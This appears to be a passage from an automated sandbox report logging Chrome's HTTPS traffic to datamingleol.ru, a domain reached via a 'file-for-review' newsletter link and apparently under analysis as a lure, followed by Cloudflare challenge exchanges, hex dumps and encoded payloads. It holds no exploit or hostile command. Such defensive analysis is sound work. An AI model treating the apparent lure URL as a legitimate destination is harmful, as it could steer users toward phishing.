                                      Data Ascii: ZKYs32irpS+eJbCtcKUpX+Iv4aPzbCgqsGkoM+psruu2byvs7C5sp3D4sjjot6qpO/B2evPvM6/wOLxyPbq/fPbu+zQ3wTv1NzU8v79wt3Z9s8S5MrTDw8S9OTuBujkFO32APIeAfP39P324QgnKCULGwYwMwYuKBYBMDg7EzYwHg9BDBUv/UUVIDtJAjwNGi8kA1IjHiUPLCIYFjI7Sl9dG1I8HTRgNWRZIWY6SW5EPkYobC1MLWxIMUdHM3Yz


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      15192.168.2.449757188.114.96.34434928C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-13 13:15:57 UTC730OUTGET /favicon.ico HTTP/1.1
                                      Host: datamingleol.ru
                                      Connection: keep-alive
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      sec-ch-ua-mobile: ?0
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      sec-ch-ua-platform: "Windows"
                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                      Sec-Fetch-Site: same-origin
                                      Sec-Fetch-Mode: no-cors
                                      Sec-Fetch-Dest: image
                                      Referer: https://datamingleol.ru/tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-review
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Cookie: PHPSESSID=k0qm5f5og2nqg3439jrhip006m
                                      2024-09-13 13:15:57 UTC657INHTTP/1.1 404 Not Found
                                      Date: Fri, 13 Sep 2024 13:15:57 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      cache-control: private, no-cache, max-age=0
                                      pragma: no-cache
                                      vary: Accept-Encoding
                                      CF-Cache-Status: BYPASS
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9H48XQCYQVOqdEDAvNY%2FZ1FL5zoYslT1KFEFFHE%2F%2B5%2BHZxaJJv7SvnAbg8ZnJGK6OUD8zV%2BO5nsXB8P7JVC0PTqO%2F3kMNlYdormBTwZmmnl0Mtn3JLpyyUAHjFgpmYwctTQ%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8c2868b5d9906a58-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-13 13:15:57 UTC712INData Raw: 34 65 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f
                                      Data Ascii: 4e1<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</
                                      2024-09-13 13:15:57 UTC544INData Raw: 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f
                                      Data Ascii: e resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px so
                                      2024-09-13 13:15:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      16192.168.2.44975935.190.80.14434928C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-13 13:15:59 UTC542OUTOPTIONS /report/v4?s=9H48XQCYQVOqdEDAvNY%2FZ1FL5zoYslT1KFEFFHE%2F%2B5%2BHZxaJJv7SvnAbg8ZnJGK6OUD8zV%2BO5nsXB8P7JVC0PTqO%2F3kMNlYdormBTwZmmnl0Mtn3JLpyyUAHjFgpmYwctTQ%3D HTTP/1.1
                                      Host: a.nel.cloudflare.com
                                      Connection: keep-alive
                                      Origin: https://datamingleol.ru
                                      Access-Control-Request-Method: POST
                                      Access-Control-Request-Headers: content-type
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-09-13 13:15:59 UTC336INHTTP/1.1 200 OK
                                      Content-Length: 0
                                      access-control-max-age: 86400
                                      access-control-allow-methods: POST, OPTIONS
                                      access-control-allow-origin: *
                                      access-control-allow-headers: content-type, content-length
                                      date: Fri, 13 Sep 2024 13:15:59 GMT
                                      Via: 1.1 google
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      17192.168.2.44976435.190.80.14434928C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-13 13:16:00 UTC484OUTPOST /report/v4?s=9H48XQCYQVOqdEDAvNY%2FZ1FL5zoYslT1KFEFFHE%2F%2B5%2BHZxaJJv7SvnAbg8ZnJGK6OUD8zV%2BO5nsXB8P7JVC0PTqO%2F3kMNlYdormBTwZmmnl0Mtn3JLpyyUAHjFgpmYwctTQ%3D HTTP/1.1
                                      Host: a.nel.cloudflare.com
                                      Connection: keep-alive
                                      Content-Length: 520
                                      Content-Type: application/reports+json
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-09-13 13:16:00 UTC520OUTData Raw: 5b 7b 22 61 67 65 22 3a 37 31 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 37 32 35 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 6d 69 6e 67 6c 65 6f 6c 2e 72 75 2f 74 4e 32 64 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 71 75 65 6c 6c 61 73 2d 6e 65 77 73 6c 65 74 74 65 72 2e 62 65 65 68 69 69 76 2e 63 6f 6d 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 6e 65 77 73 6c 65 74 74 65 72 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 66 69 6c 65 2d 66 6f 72 2d 72 65 76 69 65 77 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a
                                      Data Ascii: [{"age":711,"body":{"elapsed_time":1725,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://datamingleol.ru/tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-review","sampling_fraction":
                                      2024-09-13 13:16:00 UTC168INHTTP/1.1 200 OK
                                      Content-Length: 0
                                      date: Fri, 13 Sep 2024 13:16:00 GMT
                                      Via: 1.1 google
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      18192.168.2.449763104.18.95.414434928C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-13 13:16:00 UTC814OUTGET /cdn-cgi/challenge-platform/h/b/pat/8c2868a8da4d78e7/1726233357437/2e79c4b32ab76a8fbdddaf68a3bf5979d979c70dab68905b80a2d24b32c452d1/aclfuHDbeXB-GT0 HTTP/1.1
                                      Host: challenges.cloudflare.com
                                      Connection: keep-alive
                                      Cache-Control: max-age=0
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      sec-ch-ua-mobile: ?0
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      sec-ch-ua-platform: "Windows"
                                      Accept: */*
                                      Sec-Fetch-Site: same-origin
                                      Sec-Fetch-Mode: cors
                                      Sec-Fetch-Dest: empty
                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/9uusr/0x4AAAAAAAhY1lQpAZrIBISJ/auto/fbE/normal/auto/
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-09-13 13:16:00 UTC143INHTTP/1.1 401 Unauthorized
                                      Date: Fri, 13 Sep 2024 13:16:00 GMT
                                      Content-Type: text/plain; charset=UTF-8
                                      Content-Length: 1
                                      Connection: close
                                      2024-09-13 13:16:00 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 4c 6e 6e 45 73 79 71 33 61 6f 2d 39 33 61 39 6f 6f 37 39 5a 65 64 6c 35 78 77 32 72 61 4a 42 62 67 4b 4c 53 53 7a 4c 45 55 74 45 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                      Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gLnnEsyq3ao-93a9oo79Zedl5xw2raJBbgKLSSzLEUtEAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                      2024-09-13 13:16:00 UTC1INData Raw: 4a
                                      Data Ascii: J


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      19192.168.2.449766104.18.95.414434928C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-13 13:16:01 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1687353129:1726229860:oEB8zH5MRkhXjxacAPu7VKa8059iC9rH2eRs5vHP1jU/8c2868a8da4d78e7/245501c248c6a2e HTTP/1.1
                                      Host: challenges.cloudflare.com
                                      Connection: keep-alive
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept: */*
                                      Sec-Fetch-Site: none
                                      Sec-Fetch-Mode: cors
                                      Sec-Fetch-Dest: empty
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-09-13 13:16:01 UTC379INHTTP/1.1 404 Not Found
                                      Date: Fri, 13 Sep 2024 13:16:01 GMT
                                      Content-Type: application/json
                                      Content-Length: 7
                                      Connection: close
                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                      cf-chl-out: F76NhAdS5WO5heJ7HDcVscv92lh3YHI7E3Y=$l5Ec1GXIdxOOjRbo
                                      Server: cloudflare
                                      CF-RAY: 8c2868cbfdb48ce2-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-13 13:16:01 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                      Data Ascii: invalid


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      20192.168.2.449767104.18.95.414434928C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-13 13:16:01 UTC785OUTGET /cdn-cgi/challenge-platform/h/b/i/8c2868a8da4d78e7/1726233357439/wyw62HvqZvr0Hpv HTTP/1.1
                                      Host: challenges.cloudflare.com
                                      Connection: keep-alive
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      sec-ch-ua-mobile: ?0
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      sec-ch-ua-platform: "Windows"
                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                      Sec-Fetch-Site: same-origin
                                      Sec-Fetch-Mode: no-cors
                                      Sec-Fetch-Dest: image
                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/9uusr/0x4AAAAAAAhY1lQpAZrIBISJ/auto/fbE/normal/auto/
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-09-13 13:16:02 UTC200INHTTP/1.1 200 OK
                                      Date: Fri, 13 Sep 2024 13:16:02 GMT
                                      Content-Type: image/png
                                      Content-Length: 61
                                      Connection: close
                                      Server: cloudflare
                                      CF-RAY: 8c2868d06c1ec327-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-13 13:16:02 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 04 00 00 00 0b 08 02 00 00 00 d7 c5 bb fc 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                      Data Ascii: PNGIHDRIDAT$IENDB`


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      21192.168.2.449770104.18.95.414434928C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-13 13:16:03 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8c2868a8da4d78e7/1726233357439/wyw62HvqZvr0Hpv HTTP/1.1
                                      Host: challenges.cloudflare.com
                                      Connection: keep-alive
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept: */*
                                      Sec-Fetch-Site: none
                                      Sec-Fetch-Mode: cors
                                      Sec-Fetch-Dest: empty
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-09-13 13:16:03 UTC200INHTTP/1.1 200 OK
                                      Date: Fri, 13 Sep 2024 13:16:03 GMT
                                      Content-Type: image/png
                                      Content-Length: 61
                                      Connection: close
                                      Server: cloudflare
                                      CF-RAY: 8c2868d8e8e743ff-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-13 13:16:03 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 04 00 00 00 0b 08 02 00 00 00 d7 c5 bb fc 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                      Data Ascii: PNGIHDRIDAT$IENDB`


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      22192.168.2.449772104.18.95.414434928C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-13 13:16:03 UTC927OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1687353129:1726229860:oEB8zH5MRkhXjxacAPu7VKa8059iC9rH2eRs5vHP1jU/8c2868a8da4d78e7/245501c248c6a2e HTTP/1.1
                                      Host: challenges.cloudflare.com
                                      Connection: keep-alive
                                      Content-Length: 31735
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      Content-type: application/x-www-form-urlencoded
                                      sec-ch-ua-mobile: ?0
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      CF-Challenge: 245501c248c6a2e
                                      sec-ch-ua-platform: "Windows"
                                      Accept: */*
                                      Origin: https://challenges.cloudflare.com
                                      Sec-Fetch-Site: same-origin
                                      Sec-Fetch-Mode: cors
                                      Sec-Fetch-Dest: empty
                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/9uusr/0x4AAAAAAAhY1lQpAZrIBISJ/auto/fbE/normal/auto/
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-09-13 13:16:03 UTC16384OUTData Raw: 76 5f 38 63 32 38 36 38 61 38 64 61 34 64 37 38 65 37 3d 35 31 6b 67 4f 6f 42 39 4a 79 6b 46 6b 5a 37 56 6f 50 5a 47 6b 42 47 42 45 50 74 67 42 4d 50 6c 42 71 50 5a 49 49 4d 5a 77 39 6c 42 59 50 25 32 62 67 56 77 50 33 50 49 4d 38 61 42 24 56 6c 50 5a 55 50 6f 6c 38 56 48 67 6f 7a 44 50 52 4d 6f 54 62 76 67 6b 42 66 50 47 4d 50 66 50 70 52 30 4e 7a 77 50 50 4e 36 65 50 56 43 67 42 62 50 5a 4d 42 54 53 67 5a 6c 50 30 67 50 44 38 38 49 68 7a 50 50 45 79 76 6b 4d 50 62 47 47 56 49 6d 50 73 43 50 50 35 4e 6b 50 2b 67 56 54 49 67 50 62 37 43 4d 55 6b 7a 79 68 50 68 4a 37 50 6f 7a 33 77 76 38 32 42 32 6b 37 78 7a 48 47 37 4e 52 68 50 53 58 42 67 52 58 51 24 50 6f 5a 78 7a 6b 73 68 50 4d 77 62 32 6b 48 41 38 62 71 67 6d 6f 58 71 52 62 49 45 6d 57 35 79 78 61 61
                                      Data Ascii: v_8c2868a8da4d78e7=51kgOoB9JykFkZ7VoPZGkBGBEPtgBMPlBqPZIIMZw9lBYP%2bgVwP3PIM8aB$VlPZUPol8VHgozDPRMoTbvgkBfPGMPfPpR0NzwPPN6ePVCgBbPZMBTSgZlP0gPD88IhzPPEyvkMPbGGVImPsCPP5NkP+gVTIgPb7CMUkzyhPhJ7Poz3wv82B2k7xzHG7NRhPSXBgRXQ$PoZxzkshPMwb2kHA8bqgmoXqRbIEmW5yxaa
                                      2024-09-13 13:16:03 UTC15351OUTData Raw: 36 6b 2d 51 32 33 32 6b 56 53 74 76 65 69 6d 59 67 53 43 78 67 48 6d 56 4a 42 34 67 6f 4d 56 4a 42 78 4d 53 38 76 6b 50 47 50 6f 4d 46 62 50 58 50 32 58 67 6b 42 62 50 6b 31 6f 31 42 7a 50 6d 6d 5a 38 42 69 6d 38 50 6f 6c 42 5a 31 33 6d 48 61 50 75 4d 38 50 38 44 50 2b 50 41 6d 6f 67 50 4d 50 49 47 38 37 42 69 50 24 4d 6f 67 50 45 50 58 6e 52 45 71 58 78 68 4b 36 50 50 39 50 62 77 56 78 42 56 50 48 58 61 4c 50 36 67 6f 73 67 74 42 35 31 5a 67 50 6b 50 31 50 56 50 50 2b 74 72 67 6b 54 50 4d 42 76 6d 33 6b 50 6b 42 55 4d 6b 30 46 62 42 55 4d 52 4a 50 37 78 32 6d 41 56 33 37 42 65 50 5a 50 42 61 42 6b 67 62 54 6f 44 50 46 41 32 67 50 6d 42 31 76 49 6b 38 77 42 56 50 56 50 50 6b 42 6f 35 50 67 6f 67 6d 4d 50 5a 68 4f 4d 50 4c 50 35 39 5a 38 6f 47 50 5a 4d 56
                                      Data Ascii: 6k-Q232kVStveimYgSCxgHmVJB4goMVJBxMS8vkPGPoMFbPXP2XgkBbPk1o1BzPmmZ8Bim8PolBZ13mHaPuM8P8DP+PAmogPMPIG87BiP$MogPEPXnREqXxhK6PP9PbwVxBVPHXaLP6gosgtB51ZgPkP1PVPP+trgkTPMBvm3kPkBUMk0FbBUMRJP7x2mAV37BePZPBaBkgbToDPFA2gPmB1vIk8wBVPVPPkBo5PgogmMPZhOMPLP59Z8oGPZMV
                                      2024-09-13 13:16:03 UTC330INHTTP/1.1 200 OK
                                      Date: Fri, 13 Sep 2024 13:16:03 GMT
                                      Content-Type: text/plain; charset=UTF-8
                                      Content-Length: 28076
                                      Connection: close
                                      cf-chl-gen: F9VBD6+u8x++KfZ5+D8AoLd1J4eEuooSfUiGD/cf6KSOpiQL0p/9/VCWQY1v+upWebsUd4LYpdtXfbDM$aSkcyqG5N49lf/a+
                                      Server: cloudflare
                                      CF-RAY: 8c2868da5cb80c84-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-13 13:16:03 UTC1039INData Raw: 68 36 52 32 6d 62 57 35 6d 72 6d 37 72 4c 43 2f 78 5a 43 57 73 37 57 65 78 34 7a 41 6f 4b 32 51 78 4b 50 51 72 4d 4f 6e 32 4d 72 52 33 4b 69 2b 6e 71 76 41 71 62 50 6a 73 4c 65 78 77 4d 4c 6f 75 4b 48 45 71 4c 76 74 37 73 6e 44 34 61 2f 54 77 64 48 6b 2b 4d 6a 34 31 63 6e 4b 31 2f 37 67 30 50 7a 51 2b 4d 62 53 76 2f 6e 62 2b 75 7a 38 33 50 33 59 37 39 30 54 39 4f 33 6e 46 68 63 4a 46 66 58 33 31 50 63 64 47 2b 2f 74 49 66 44 36 43 42 48 30 48 2b 72 33 44 43 51 41 4c 53 73 43 45 79 30 42 4b 76 59 45 47 50 4d 48 4b 68 54 37 49 50 30 4e 4d 77 4d 50 4f 7a 51 55 4f 44 4d 5a 46 54 6f 49 4c 42 6f 61 4d 55 63 50 55 41 74 49 45 7a 42 47 4c 42 6c 49 4c 6a 42 67 4f 42 63 64 47 55 45 35 59 57 68 68 51 69 63 6a 51 43 4e 43 4a 6c 74 45 53 58 49 7a 63 6b 67 79 54 30 56
                                      Data Ascii: h6R2mbW5mrm7rLC/xZCWs7Wex4zAoK2QxKPQrMOn2MrR3Ki+nqvAqbPjsLexwMLouKHEqLvt7snD4a/TwdHk+Mj41cnK1/7g0PzQ+MbSv/nb+uz83P3Y790T9O3nFhcJFfX31PcdG+/tIfD6CBH0H+r3DCQALSsCEy0BKvYEGPMHKhT7IP0NMwMPOzQUODMZFToILBoaMUcPUAtIEzBGLBlILjBgOBcdGUE5YWhhQicjQCNCJltESXIzckgyT0V
                                      2024-09-13 13:16:03 UTC1369INData Raw: 2f 6f 73 66 45 79 4a 62 4b 68 71 53 79 69 61 61 4f 79 61 75 56 30 6f 2f 4b 71 4c 57 64 32 37 61 59 6c 39 36 38 34 61 4f 66 32 4e 32 66 75 38 72 59 77 36 44 4c 79 4f 54 6c 32 38 6e 45 7a 75 69 76 30 74 50 4c 37 63 33 38 76 75 6a 77 77 4c 72 4e 39 4f 4c 6b 43 76 50 30 39 74 6e 57 34 76 72 64 32 76 7a 2b 34 64 34 52 41 2b 58 69 32 51 66 70 35 66 49 4c 37 65 6b 5a 38 76 73 46 39 79 4d 47 2b 50 7a 35 41 2f 76 6d 44 53 77 4f 49 50 7a 76 37 44 50 76 4d 6a 76 78 50 51 30 6e 4f 52 30 50 45 30 46 45 47 7a 38 35 4a 78 56 42 53 55 77 68 52 30 45 75 44 6b 6c 52 56 43 39 50 53 54 59 55 55 56 6c 63 4e 56 64 52 50 68 4e 5a 59 57 52 43 58 31 6c 47 4b 53 49 68 57 53 68 75 57 79 70 42 62 55 4e 54 54 58 5a 78 59 55 35 78 61 45 68 61 50 6b 74 62 65 45 70 5a 68 59 42 65 68 46
                                      Data Ascii: /osfEyJbKhqSyiaaOyauV0o/KqLWd27aYl9684aOf2N2fu8rYw6DLyOTl28nEzuiv0tPL7c38vujwwLrN9OLkCvP09tnW4vrd2vz+4d4RA+Xi2Qfp5fIL7ekZ8vsF9yMG+Pz5A/vmDSwOIPzv7DPvMjvxPQ0nOR0PE0FEGz85JxVBSUwhR0EuDklRVC9PSTYUUVlcNVdRPhNZYWRCX1lGKSIhWShuWypBbUNTTXZxYU5xaEhaPktbeEpZhYBehF
                                      2024-09-13 13:16:03 UTC1369INData Raw: 79 4b 62 43 70 74 47 71 6f 4b 4b 4a 72 71 53 6d 6d 4c 4b 6f 71 74 4f 32 72 4b 37 67 74 4c 6e 67 73 37 61 34 74 38 71 38 35 36 58 58 32 73 71 39 77 2b 2f 30 31 72 66 4d 2b 65 36 35 79 64 58 62 37 4c 2b 7a 31 76 67 41 42 39 6e 68 31 67 4c 79 41 64 55 47 7a 41 51 45 36 74 44 69 44 51 54 79 42 52 54 55 47 4d 33 61 2b 76 66 71 41 50 72 36 39 65 30 6e 33 69 67 53 42 77 51 73 48 42 38 65 4b 77 34 62 44 7a 49 6f 4a 79 45 69 44 53 6f 7a 39 77 6f 38 4a 79 6f 56 4d 7a 73 41 45 6b 55 5a 4d 68 30 37 48 51 67 61 53 6b 6f 39 45 41 51 6e 53 56 42 58 4b 6a 49 6e 55 6b 4e 52 4a 6c 59 64 56 46 51 37 49 54 4e 64 56 45 4e 56 5a 43 56 6f 48 69 74 4c 52 32 31 51 53 30 74 50 52 45 39 50 56 30 68 54 55 32 56 4d 56 31 64 4c 55 46 74 62 56 6b 36 48 50 34 68 79 5a 32 53 4d 66 48 39
                                      Data Ascii: yKbCptGqoKKJrqSmmLKoqtO2rK7gtLngs7a4t8q856XX2sq9w+/01rfM+e65ydXb7L+z1vgAB9nh1gLyAdUGzAQE6tDiDQTyBRTUGM3a+vfqAPr69e0n3igSBwQsHB8eKw4bDzIoJyEiDSoz9wo8JyoVMzsAEkUZMh07HQgaSko9EAQnSVBXKjInUkNRJlYdVFQ7ITNdVENVZCVoHitLR21QS0tPRE9PV0hTU2VMV1dLUFtbVk6HP4hyZ2SMfH9
